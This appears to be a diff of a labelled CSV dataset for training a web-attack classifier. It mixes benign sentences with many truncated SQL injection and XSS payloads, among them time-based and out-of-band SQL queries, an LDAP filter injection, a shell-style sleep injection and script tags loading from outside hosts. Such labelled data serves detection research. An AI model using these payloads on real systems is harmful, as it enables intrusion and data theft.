1477--,2,SQLi,18846 -<s onpointerup=alert(1)>XSS</s>,1,XSS,1814 -"><img src=x onerror=javascript:alert(A"")>",1,XSS,1272 -1' where 1153 = 1153 or ( select * from ( select (,2,SQLi,15227 -"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('');"">",1,XSS,2995 -Draper James: 50 percent off select styles; throug,0,normal,26229 -1' ) rlike sleep ( 5 ) and ( 'boto' = 'boto,2,SQLi,15675 -"-4635"" union all select 5087,5087,5087,5087,5087,5",2,SQLi,15439 -Insert SIM card.,0,normal,22794 -"The oven was blazing, so the time came to select t",0,normal,25400 -Please select a honeymoon resort.,0,normal,24396 -<tbody onpointerleave=alert(1)>XSS</tbody>,1,XSS,2643 -<script>alert(1)//,1,XSS,9281 -Delete cookies.,0,normal,23071 -"1"" ) where 9855 = 9855",2,SQLi,18690 -Select the best photographer.,0,normal,24360 -"1"" ) ) as turj where 1237 = 1237",2,SQLi,21563 -"<dd onpaste=""alert(1)"" contenteditable>test</dd>",1,XSS,4196 -( 2329 = 4209 ) *1,2,SQLi,13033 --7941 or ( 5822 = 8754 ) *8754-- eepn,2,SQLi,12769 -1'|| ( select 'svbf' where 7017 = 7017 or elt ( 62,2,SQLi,12361 -<svg><button onload=alert(1)></button>,1,XSS,3850 +"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,17203 +1'+ ( select gajr where 6653 = 6653 union all sele,2,SQLi,13321 +Select the best wedding cake flavor.,0,normal,24392 +"<blink onmousedown=""alert(1)"">test</blink>",1,XSS,4399 +"<em onmousemove=""alert(1)"">test</em>",1,XSS,8478 +select current_setting('hba_file');,2,SQLi,22511 +"1"" where 7279 = 7279 or 8514 = benchmark ( 5000000",2,SQLi,20507 +-1344 ) as gqgi where 2545 = 2545 or 4144 = ( sele,2,SQLi,18848 +"<select draggable=""true"" ondrag=""alert(1)"">test</s",1,XSS,1815 +><img src=x onerror=javascript:alert((`A`))>,1,XSS,1273 +1' ) and 6537 = dbms_pipe.receive_message ( chr ( ,2,SQLi,15229 +"<nobr onmouseenter=""alert(1)"">test</nobr>",1,XSS,2996 +Drop down list 3 allows you to select a specific c,0,normal,26226 +"1"" or 5286 = ( select count ( * ) from all_users t",2,SQLi,15677 +"1%"" ) and 4386 = utl_inaddr.get_host_address ( chr",2,SQLi,15441 +Update software.,0,normal,22796 +The Pittsburg charter of 1816 vested the more impo,0,normal,25397 +Select your dream honeymoon activities.,0,normal,24393 +<script onpointerup=alert(1)>XSS</script>,1,XSS,2644 +<script>alert(document.documentElement.innerHTML.m,1,XSS,9283 +Create drawing.,0,normal,23068 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,18692 +"In the Settings box, select Apps and then Apps & F",0,normal,25992 +"1"" ) ) as nncz where 2331 = 2331",2,SQLi,21565 +<nextid id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,4198 +"1"" where 1051 = 1051 union all select null--",2,SQLi,13035 +"1%"" and updatexml ( 3393,concat ( 0x2e,0x7171706a7",2,SQLi,12771 +"1"" ) and 3707 = ( select count ( * ) from sysibm.s",2,SQLi,12363 +"<pre oncontextmenu=""alert(1)"">test</pre>",1,XSS,3852 "{""id"":null,""firstName"":""Reign"",""lastName"":""Hc"",""ad",0,normal,27407 -The Select Transactions of this society were colle,0,normal,25349 -1 ) ) ) and 9575 = 1640--,2,SQLi,16195 -"1%"" ) rlike ( select ( case when ( 7736 = 7642 ) t",2,SQLi,15254 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19234 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,16194 -"<td onmouseup=""alert(1)"">test</td>",1,XSS,3555 --3604' ) as fyev where 7259 = 7259 union all selec,2,SQLi,18580 -1 and 8407 = ( select count ( * ) from generate_se,2,SQLi,13238 -<form onpointerdown=alert(1)>XSS</form>,1,XSS,2601 -Let's discuss where to go for the team outing.,0,normal,23859 -Join us for dinner.,0,normal,22548 -"<html><BODY><?xml:namespace prefix=""t"" ns=""urn:sch",1,XSS,1519 -<optgroup onblur=alert(1) tabindex=1 id=x></optgro,1,XSS,4118 -Plant some vibrant flowers.,0,normal,22694 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10826 -"<source onmouseover=""alert(1)"">test</source>",1,XSS,5756 -<image2 onpointerdown=alert(1)>XSS</image2>,1,XSS,5634 -<dt onpointerenter=alert(1)>XSS</dt>,1,XSS,8400 -You can then select games from the menu and start ,0,normal,25085 -1,0,normal,26675 -1' in boolean mode ) order by 1--,2,SQLi,13066 -"<nav onkeypress=""alert(1)"" contenteditable>test</n",1,XSS,7163 -1' in boolean mode ) and 6537 = dbms_pipe.receive_,2,SQLi,22193 -"1%"" ) or sleep ( 5 ) #",2,SQLi,20187 -"1' ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( ch",2,SQLi,14257 -select * from users where id = '1' + @ ( 1 ) union,2,SQLi,11738 -"1' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex (",2,SQLi,15442 -<object onpointerup=alert(1)>XSS</object>,1,XSS,1989 -"<caption onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,7738 -1%' ) ) ) or 6793 = ( select 6793 from pg_sleep ( ,2,SQLi,16902 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10562 -Update the shopping list.,0,normal,22545 +Then I need to select the right size and click buy,0,normal,25346 +"1"" ) ) and 9254 = ( select count ( * ) from rdb$fi",2,SQLi,16197 +"1"" ) where 9827 = 9827",2,SQLi,15256 +1' or 5356 = ( select count ( * ) from sysusers as,2,SQLi,19236 +"-3963"" or 1224 = 5119",2,SQLi,16196 +<marquee onpointerout=alert(1)>XSS</marquee>,1,XSS,3557 +-8836%' ) or 4856 = 3891,2,SQLi,18582 +"1"" ) ) ) or sleep ( 5 ) and ( ( ( ""eran"" = ""eran",2,SQLi,13240 +"<option onmouseover=""alert(1)"">test</option>",1,XSS,2602 +I want to select a book to read next.,0,normal,23856 +Filter your email messages.,0,normal,22550 +<? echo('<SCR)';echo('IPT>document.vulnerable=true,1,XSS,1520 +<style>:target {color: red;}</style><table id=x st,1,XSS,4120 +Where's the missing key?,0,normal,22696 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10828 +"<blockquote draggable=""true"" ondragend=""alert(1)"">",1,XSS,5758 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5636 +<meta id=x tabindex=1 onfocusin=alert(1)></meta>,1,XSS,8402 +You can select anywhere from five minutes to an ho,0,normal,25082 +1,0,normal,26672 +1%' ) or 7427 = dbms_pipe.receive_message ( chr ( ,2,SQLi,13068 +"<samp onpaste=""alert(1)"" contenteditable>test</sam",1,XSS,7165 +"1"" ) or ( select 9173 from ( select count ( * ) ,c",2,SQLi,22195 +1'|| ( select 'aair' where 9234 = 9234 union all s,2,SQLi,20189 +"1"" ) ) rlike sleep ( 5 ) and ( ( ""ahhx"" like ""ahhx",2,SQLi,14259 +or sleep ( __TIME__ ) #,2,SQLi,11740 +"-5024%"" or make_set ( 3321 = 7355,7355 ) and ""%"" =",2,SQLi,15444 +<svg><menu onload=alert(1)></menu>,1,XSS,1990 +<figcaption onpointerover=alert(1)>XSS</figcaption,1,XSS,7740 +"1"" ) or ( select * from ( select ( sleep ( 5 ) ) )",2,SQLi,16904 +"UNION ALL SELECT 1,2--",2,SQLi,10564 +Delete the old files.,0,normal,22547 "<a href=""java&Tab;script:alert(1)"">XSS</a>",1,XSS,202 -"And then when our customers select their profile, ",0,normal,26363 --7963'+ ( select 'kxzh' where 7039 = 7039 union al,2,SQLi,22078 -Insert the fresh cartridge.,0,normal,22746 -1 ) ) as jvoo where 5116 = 5116 or 4240 = ( select,2,SQLi,20841 -1' where 6953 = 6953 or 2367 = ( select count ( * ,2,SQLi,19146 --4807' where 3232 = 3232 or make_set ( 6599 = 5179,2,SQLi,15167 -Create a meme.,0,normal,22866 -1 and 2006 = 2006,2,SQLi,22296 -Insert the USB drive into the computer.,0,normal,22932 -<noembed id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,4856 -If you have a voltmeter or DVM select the 200 volt,0,normal,26048 -Where's the missing jigsaw piece?,0,normal,22743 -onmouseover%3dprompt(941634),1,XSS,9742 -"1"" ) where 2758 = 2758 union all select null,null,",2,SQLi,12503 -"-4397' ) ) ) or make_set ( 9354 = 9354,7185 ) and ",2,SQLi,15951 -1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,18823 -<frameset onpointerenter=alert(1)>XSS</frameset>,1,XSS,3766 -I'm considering where to have a quiet retreat.,0,normal,23985 --8341 or 8571 = 8571--,2,SQLi,13453 -<wbr onblur=alert(1) tabindex=1 id=x></wbr><input ,1,XSS,6433 -"<menuitem draggable=""true"" ondragend=""alert(1)"">te",1,XSS,7847 -I'll select my groomsmen's attire.,0,normal,24414 -1'+ ( select 'sbvh' where 8539 = 8539 and 3707 = (,2,SQLi,12254 -Update the software package.,0,normal,22725 -"-3505"" ) or 5290 = 3436--",2,SQLi,21206 -"-2639"" ) where 1494 = 1494 union all select 1494--",2,SQLi,16403 -"-2745' or elt ( 1032 = 1032,3623 )",2,SQLi,19945 -1' ) ) ) and 4069 = 8786 and ( ( ( 'eftr' = 'eftr,2,SQLi,20336 -"1 ) where 4226 = 4226 or elt ( 5873 = 5873,sleep (",2,SQLi,16434 +"Another select committee, this time of the House o",0,normal,26360 +-5516'+ ( select 'bmlv' where 7188 = 7188 union al,2,SQLi,22080 +Select a cozy nook.,0,normal,22748 +1 where 5359 = 5359 and 4386 = utl_inaddr.get_host,2,SQLi,20843 +"1"" ) ) as wugz where 5355 = 5355 and 3824 = benchm",2,SQLi,19148 +"( select like ( 'abcdefg',upper ( hex ( randomblob",2,SQLi,15169 +Update the file.,0,normal,22868 +1'|| ( select 'ucro' where 9912 = 9912 and 8594 = ,2,SQLi,22298 +Where should we go for our weekend trip?,0,normal,22934 +"<style>@keyframes x{}</style><spacer style=""animat",1,XSS,4858 +If you touch and hold your finger on a space where,0,normal,26045 +Join the fitness session.,0,normal,22745 +"onerror=alert()1 a=""",1,XSS,9744 +"1%"" ) ) ) union all select null#",2,SQLi,12505 +select pg_sleep ( 5 ) and ( 1044 = 1044,2,SQLi,15953 +"iif ( 4460 = 1610,1,1/0 )",2,SQLi,18825 +"<details onkeypress=""alert(1)"" contenteditable>tes",1,XSS,3768 +She chose a hiking trail to explore from the map.,0,normal,23982 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,13455 +<dfn onpointerover=alert(1)>XSS</dfn>,1,XSS,6435 +<sub onpointerup=alert(1)>XSS</sub>,1,XSS,7849 +Where's the best place to go for a run?,0,normal,23719 +1'|| ( select 'uiyj' from dual where 8320 = 8320,2,SQLi,12256 +Delete the old records.,0,normal,22727 +"1' where 4245 = 4245 union all select null,null--",2,SQLi,21208 +"-4825%' ) union all select 6804,6804,6804,6804,680",2,SQLi,16405 +( case when 8422 = 8452 then 1 else null end ),2,SQLi,19947 +select ( case when ( 5418 = 6516 ) then 1 else 541,2,SQLi,20338 +"1%"" and make_set ( 8403 = 8403,8899 ) and ""%"" = """,2,SQLi,16436 "{""id"":null,""firstName"":""Veliani"",""lastName"":""Sanja",0,normal,27480 <iframe/onreadystatechange=alert(1),1,XSS,888 -"<isindex draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,6262 -<col onpointerenter=alert(1)>XSS</col>,1,XSS,6990 -<code onpointermove=alert(1)>XSS</code>,1,XSS,6044 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#",2,SQLi,10809 -"1"" ) and make_set ( 8403 = 8403,8899 ) and ( ""akha",2,SQLi,19553 -1' ) ) as xjen where 6791 = 6791 or char ( 68 ) ||,2,SQLi,19334 -&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quo,1,XSS,1425 -"1"" ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,16524 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,15925 -1' where 8430 = 8430 or 7417 = ( select count ( * ,2,SQLi,19582 --1127 or 7391 = 4954,2,SQLi,21516 +<nav id=x tabindex=1 onfocus=alert(1)></nav>,1,XSS,6264 +<keygen onpointerover=alert(1)>XSS</keygen>,1,XSS,6992 +"<applet draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,6046 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10811 +1' where 7176 = 7176,2,SQLi,19555 +1' ) ) ) or ( select * from ( select ( sleep ( 5 ),2,SQLi,19336 +"&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &",1,XSS,1426 +1' ) as sjzi where 8242 = 8242 and 9254 = ( select,2,SQLi,16526 +1%' ) ) and 4386 = utl_inaddr.get_host_address ( c,2,SQLi,15927 +"1 ) and elt ( 4249 = 4249,7259 )",2,SQLi,19584 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,21518 "<script><img title=""</script><img src onerror=aler",1,XSS,113 -"<tr draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,8161 -Pilot programs involving select users have been un,0,normal,25776 -"-6442"" ) ) ) or 3038 = 3038",2,SQLi,16200 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4560 -1'|| ( select 'akye' where 9242 = 9242 union all s,2,SQLi,20980 -Randomly select a book.,0,normal,24348 -) or ( 'x' = 'x,2,SQLi,11443 -1'|| ( select 'tdcr' where 6792 = 6792 union all s,2,SQLi,21075 -")) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337",2,SQLi,11255 -Select impress.,0,normal,24728 -"<code onmouseover=""alert(1)"">test</code>",1,XSS,8567 -select ( case when ( 8350 = 7872 ) then 8350 else ,2,SQLi,16312 -1' and 4595 = 4595#,2,SQLi,19662 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10759 -"1%"" ) ) rlike ( select * from ( select ( sleep ( 5",2,SQLi,20453 --3209'+ ( select ldum where 9912 = 9912 union all ,2,SQLi,20793 -1'+ ( select 'usoq' where 7783 = 7783 and updatexm,2,SQLi,17267 -"1%"" ) or 8421 = ( select count ( * ) from generate",2,SQLi,19478 -"-1187' ) union all select 8202,8202,8202,8202,8202",2,SQLi,16836 -"<th onkeyup=""alert(1)"" contenteditable>test</th>",1,XSS,3732 -For control select a disinfectant with proven acti,0,normal,26180 -"<thead onbeforecut=""alert(1)"" contenteditable>test",1,XSS,4987 -1' ) and sleep ( 5 ),2,SQLi,20048 -"<noscript oncontextmenu=""alert(1)"">test</noscript>",1,XSS,2764 -"1"" ) as zovk where 4591 = 4591 or 4240 = ( select ",2,SQLi,13795 -"To find out more, select from the left-hand naviga",0,normal,25266 -"<meter oncut=""alert(1)"" contenteditable>test</mete",1,XSS,1856 -waitfor delay '0:0:5' and ( ( ( 8981 = 8981,2,SQLi,15600 -1'|| ( select 'qsgi' where 1707 = 1707 or 9643 = (,2,SQLi,12813 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8163 +Please select from the categories on the left side,0,normal,25773 +"1"" or 7552 = ( select count ( * ) from rdb$fields ",2,SQLi,16202 +<ruby onpointerup=alert(1)>XSS</ruby>,1,XSS,4562 +"1"" ) ) or ( select 9173 from ( select count ( * ) ",2,SQLi,20982 +Select your dream vacation spot.,0,normal,24345 +$ ( sleep 50 ),2,SQLi,11445 +-9098'|| ( select 'xodn' from dual where 8202 = 82,2,SQLi,21077 +"1 AND ELT(1337=1337,SLEEP(5))",2,SQLi,11257 +Select amuse.,0,normal,24725 +<title onblur=alert(1) tabindex=1 id=x></title><in,1,XSS,8569 +1' ) ) or ( select * from ( select ( sleep ( 5 ) ),2,SQLi,16314 +"-7418 union all select 1340,1340,1340,1340,1340#",2,SQLi,19664 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10761 +"iif ( 9229 = 4158,1,1/0 )",2,SQLi,20455 +"-7125"" or ( 8919 = 2275 ) *2275 and ""fbwo"" = ""fbwo",2,SQLi,20795 +1%' or 8421 = ( select count ( * ) from generate_s,2,SQLi,17269 +"-7422"" union all select 9127,9127,9127,9127,9127,9",2,SQLi,19480 +"1 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 )",2,SQLi,16838 +(alert)(1),1,XSS,3734 +For investors who want to take advantage of Goldma,0,normal,26177 +"<rtc onkeydown=""alert(1)"" contenteditable>test</rt",1,XSS,4989 +"1"" ) as yzzk where 1813 = 1813 and ( 3020 = 3020 )",2,SQLi,20050 +"<title onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,2765 +"-4045 union all select 6857,6857,6857,6857,6857,68",2,SQLi,13797 +"To partially ameliorate this problem, right click ",0,normal,25263 +"<style>@keyframes x{}</style><body style=""animatio",1,XSS,1857 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,15602 +select sleep ( 5 ) and ( 'hhlq' like 'hhlq,2,SQLi,12815 "&lt;TABLE&gt;&lt;TD BACKGROUND=\""javascript&#058;a",1,XSS,1000 "<frameset onFocus frameset onFocus=""javascript:jav",1,XSS,390 -select * from users where id = 1 &@ or 1 = 1 -- 1,2,SQLi,11600 -"<style>@keyframes x{}</style><plaintext style=""ani",1,XSS,6427 -1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ,2,SQLi,17861 -1' ) where 7391 = 7391 or ( select 9173 from ( sel,2,SQLi,18625 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10579 -"A few sale items are available online, however: Th",0,normal,26439 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8113 -"-1737' or 1570 = convert ( int, ( select char ( 11",2,SQLi,17377 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4998 -select ( case when ( 1407 = 2741 ) then 1407 else ,2,SQLi,20307 -"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,19357 --3496' ) ) or 9323 = 9323#,2,SQLi,14212 -Guys seriously start realizing league of legends i,0,normal,26496 -"<audio oncut=""alert(1)"" contenteditable>test</audi",1,XSS,4797 -"<figcaption oncopy=""alert(1)"" contenteditable>test",1,XSS,4770 -1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ,2,SQLi,17678 -||utl_http.request('httP://192.168.1.1/')||',2,SQLi,11066 -<svg><ins onload=alert(1)></ins>,1,XSS,4174 -1' ) ) ) or 8421 = ( select count ( * ) from gener,2,SQLi,18920 -A snowblower buying guide can help you select the ,0,normal,26430 -<data onfocusout=alert(1) tabindex=1 id=x></data><,1,XSS,1908 -<small onpointerenter=alert(1)>XSS</small>,1,XSS,4947 -<bgsound id=x tabindex=1 onfocusin=alert(1)></bgso,1,XSS,8561 -"<spacer ondblclick=""alert(1)"">test</spacer>",1,XSS,6034 -"<style>@keyframes x{}</style><u style=""animation-n",1,XSS,7620 -<isindex/autofocus/onfocus=alert()>,1,XSS,1152 -"1%"" ) ) ) and sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,17952 -"-5507' or elt ( 1032 = 1032,3623 ) and 'ndqw' = 'n",2,SQLi,19556 -"Ideally, ask someone else to select a small platef",0,normal,26061 -"<img src=x onerror=alert(String.fromCharCode(88,83",1,XSS,9690 -"<acronym onkeyup=""alert(1)"" contenteditable>test</",1,XSS,7107 -"In 2017, you had until January 31 to select your p",0,normal,26017 -1' ) rlike ( select * from ( select ( sleep ( 5 ) ,2,SQLi,20545 -"<spacer onmouseover=""alert(1)"">test</spacer>",1,XSS,4288 -<input3 onpointerleave=alert(1)>XSS</input3>,1,XSS,2231 +select * from users where id = 1 or \< = 1 or 1 = ,2,SQLi,11602 +"<small onkeydown=""alert(1)"" contenteditable>test</",1,XSS,6429 +"1"" ) ) or ( select * from ( select ( sleep ( 5 ) )",2,SQLi,17863 +"1' ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,18627 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10581 +A parliament (31st of August) demanded the loss of,0,normal,26436 +"<rtc onmouseout=""alert(1)"">test</rtc>",1,XSS,8115 +1%' ) ) union all select null--,2,SQLi,17379 +<style>:target {color:red;}</style><font id=x styl,1,XSS,5000 +1' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 1,2,SQLi,20309 +1' ) ) as kgiw where 7452 = 7452 and 6510 = ( sele,2,SQLi,19359 +"1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ",2,SQLi,14214 +I can't say how much I enjoyed the streams today. ,0,normal,26493 +"<menuitem onmouseover=""alert(1)"">test</menuitem>",1,XSS,4799 +"<source draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,4772 +1' ) where 3271 = 3271 and 6055 = ctxsys.drithsx.s,2,SQLi,17680 +AND 1=utl_inaddr.get_host_address((SELECT banner F,2,SQLi,11068 +"<isindex onkeypress=""alert(1)"" contenteditable>tes",1,XSS,4176 +"1"" ) ) as ylah where 9248 = 9248",2,SQLi,18922 +A vacancy among the fellows is filled up by the pr,0,normal,26427 +"<mark draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,1909 +"<dl draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,4949 +<cite onpointermove=alert(1)>XSS</cite>,1,XSS,8563 +<td id=x tabindex=1 onfocus=alert(1)></td>,1,XSS,6036 +<applet id=x tabindex=1 ondeactivate=alert(1)></ap,1,XSS,7622 +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#,1,XSS,1153 +1' ) ) as agdn where 8442 = 8442 and 3824 = benchm,2,SQLi,17954 +1' ) ) and ( select 9067 from ( select count ( * ),2,SQLi,19558 +VITAMIN E RAISES PROSTATE CANCER RISK: THE select ,0,normal,25183 +<img src=x:alert(alt) onerror=eval(src) alt=xss>,1,XSS,9692 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7109 +"In Bushwick, she will play the chorus on select ni",0,normal,26014 +"1%"" ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ",2,SQLi,20547 +"<h1 oncut=""alert(1)"" contenteditable>test</h1>",1,XSS,4290 +"<html onkeydown=""alert(1)"" contenteditable>test</h",1,XSS,2232 "<link rel=""canonical"" accesskey=""X"" onclick=""alert",1,XSS,175 -"1"" ) as ybkp where 7788 = 7788 or 8466 = benchmark",2,SQLi,18288 -"<style>@keyframes x{}</style><output style=""animat",1,XSS,8753 -<footer onfocusout=alert(1) tabindex=1 id=x></foot,1,XSS,3409 -<<script>document.vulnerable=true;</script>,1,XSS,1539 -<figcaption onpointerdown=alert(1)>XSS</figcaption,1,XSS,2293 -"javascript:alert()//'//""//\""; '/`/*\/*'/*""/**/(ale",1,XSS,9524 -"<TD BACKGROUND=""javascript:alert('XSS')"">",1,XSS,1364 -"<output onmouseenter=""alert(1)"">test</output>",1,XSS,4358 -1 ) where 3738 = 3738 or 8421 = ( select count ( *,2,SQLi,21645 -"1%' ) ) ) procedure analyse ( extractvalue ( 9627,",2,SQLi,18505 -"-8773%' ) ) ) union all select 8941,8941,8941,8941",2,SQLi,18909 +-5313' ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ,2,SQLi,18290 +"?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgn",1,XSS,8755 +<hgroup id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,3411 +<![<!--]]<script>document.vulnerable=true;//--></s,1,XSS,1540 +"<audio onmouseout=""alert(1)"">test</audio>",1,XSS,2294 +"javascript:alert()//\""//`//'//""//--></style></sele",1,XSS,9526 +"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://hacke",1,XSS,1365 +<content id=x tabindex=1 onfocusin=alert(1)></cont,1,XSS,4360 +"1"" ) ) as spvl where 2242 = 2242 or 6793 = ( selec",2,SQLi,21647 +1 ) ) ) and ( select 9067 from ( select count ( * ,2,SQLi,18507 +"1' or elt ( 6272 = 6272,sleep ( 5 ) ) and 'vrim' =",2,SQLi,18911 "<img src=x onerror=\x12""javascript:alert(1)"">",1,XSS,681 -1'|| ( select 'ozki' where 4435 = 4435 ( select ( ,2,SQLi,13051 -Select depart.,0,normal,24638 -"<s draggable=""true"" ondragenter=""alert(1)"">test</s",1,XSS,3665 --4828'+ ( select qxnw where 9488 = 9488 union all ,2,SQLi,18046 +1 and ( select * from ( select ( sleep ( 5 ) ) ) f,2,SQLi,13053 +Select stay.,0,normal,24635 +"<rtc onmousedown=""alert(1)"">test</rtc>",1,XSS,3667 +"1' in boolean mode ) and 8148 = like ( 'abcdefg',u",2,SQLi,18048 "<a href=""\xE2\x80\x8Ajavascript:javascript:alert(1",1,XSS,509 <embed code=https://portswigger-labs.net width=500,1,XSS,167 -1' ) where 1212 = 1212,2,SQLi,13690 -"Users first go to broadcast Live, select the Lip S",0,normal,25194 -"{""id"":null,""name"":""winter""}",0,normal,26843 +1' ) ) ) and ( 1685 = 2985 ) *2985 and ( ( ( 'rzwb,2,SQLi,13692 +Users who have access to the Tinder Select layer o,0,normal,25191 +"{""id"":null,""firstName"":""Nagalingam Shanmuganathan""",0,normal,26840 +"<title onmouseout=""alert(1)"">test</title>",1,XSS,1916 +"<basefont onbeforecopy=""alert(1)"" contenteditable>",1,XSS,7266 +"{""id"":null,""firstName"":""Steven"",""lastName"":""Koh"",""",0,normal,27124 +"{""id"":null,""firstName"":""Gerald"",""lastName"":""Ong"",""",0,normal,27275 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10731 +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss,1,XSS,1106 +* ( | ( objectclass = * ) ),2,SQLi,12070 +"<rb oncontextmenu=""alert(1)"">test</rb>",1,XSS,2612 +"AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036",2,SQLi,9947 +<style>:target {color: red;}</style><code id=x sty,1,XSS,5313 +Select the next book for our book club.,0,normal,24063 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11111 +1 and sleep(5),2,SQLi,11159 +-5327' ) ) ) or 1606 = 6099,2,SQLi,22141 +<svg><set xlink:href=#xss attributeName=href from=,1,XSS,153 +1 ) ( select ( case when ( 4587 = 4587 ) then rege,2,SQLi,13425 +Select hide.,0,normal,24689 +"-8661"" union all select 5731,5731--",2,SQLi,22066 +"<bdo oncut=""alert(1)"" contenteditable>test</bdo>",1,XSS,2834 +"{""id"":null,""name"":""Zonkey""}",0,normal,27473 +Find entries where required.,0,normal,23265 +"<nextid onmouseleave=""alert(1)"">test</nextid>",1,XSS,3554 +1 ) ) ) rlike ( select * from ( select ( sleep ( 5,2,SQLi,20109 +Select the best route for your road trip.,0,normal,24115 +Select theaters will start showing the film on Apr,0,normal,25575 +1 ) ) ) waitfor delay '0:0:5'--,2,SQLi,12544 +"<form draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,4541 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14370 +Won: Best Foreign Film Available: to watch in sele,0,normal,25110 +or userid like '%,2,SQLi,10017 +1'|| ( select 'cclo' from dual where 6823 = 6823 a,2,SQLi,12281 +Select a painting style to explore.,0,normal,24032 +"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,15091 +select case when 4488 = 5522 then 1 else null end-,2,SQLi,18378 +Crate & Barrel: 15% off select full-priced items u,0,normal,26263 +<td id=x tabindex=1 onfocusin=alert(1)></td>,1,XSS,5144 +select * from users where id = 1 or $+<$ union sel,2,SQLi,11817 +1'|| ( select 'uebk' from dual where 6990 = 6990,2,SQLi,20198 +Operators conveniently omit this evidence when quo,0,normal,25809 +<style>:target {color: red;}</style><p id=x style=,1,XSS,3453 +1 ) ) as henn where 9980 = 9980 or 4915 = ( select,2,SQLi,20978 +1 ) as xuvz where 3061 = 3061 or 2367 = ( select c,2,SQLi,16592 +Update signature.,0,normal,23067 +1' in boolean mode ) and 6414 = ( select count ( *,2,SQLi,13159 +"<area draggable=""true"" ondrag=""alert(1)"">test</are",1,XSS,2751 +1'|| ( select 'qued' where 9801 = 9801 procedure a,2,SQLi,18236 +"At the top right, select the name of your account.",0,normal,26340 +1' ) as dqgr where 2427 = 2427 and ( 3020 = 3020 ),2,SQLi,19627 +"1"" ) ) as kmss where 3214 = 3214 and char ( 109 ) ",2,SQLi,12710 +"1' in boolean mode ) and updatexml ( 3393,concat (",2,SQLi,20469 +"1"" ) as rgbz where 6687 = 6687 and 2716 = ( select",2,SQLi,19496 +1'|| ( select 'xlmt' where 1664 = 1664,2,SQLi,13134 +1'+ ( select 'sbvh' where 8539 = 8539 and 3707 = (,2,SQLi,12254 +union select * from users where login = char ...,2,SQLi,10182 +"1"" ) as qirf where 6200 = 6200 ( select ( case whe",2,SQLi,22321 +"<dt onclick=""alert(1)"">test</dt>",1,XSS,5813 +<fieldset id=x tabindex=1 onfocusin=alert(1)></fie,1,XSS,5637 +"1' ) ) ) procedure analyse ( extractvalue ( 5840,c",2,SQLi,20694 +"select * from users where id = 1 or "";@"" or 1 = 1 ",2,SQLi,11583 +1 and 8514 = ( select count ( * ) from domain.doma,2,SQLi,19543 +1' ) ) ) rlike sleep ( 5 ) #,2,SQLi,13929 +Filter the junk mail from your mailbox.,0,normal,22921 +"A continuation of it, containing selected works of",0,normal,26440 +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;,1,XSS,1382 +"Scroll down and select ""Accessibility"" from the th",0,normal,25701 +"1"" ) as jaxh where 6318 = 6318 and extractvalue ( ",2,SQLi,14904 +"<meta onbeforecut=""alert(1)"" 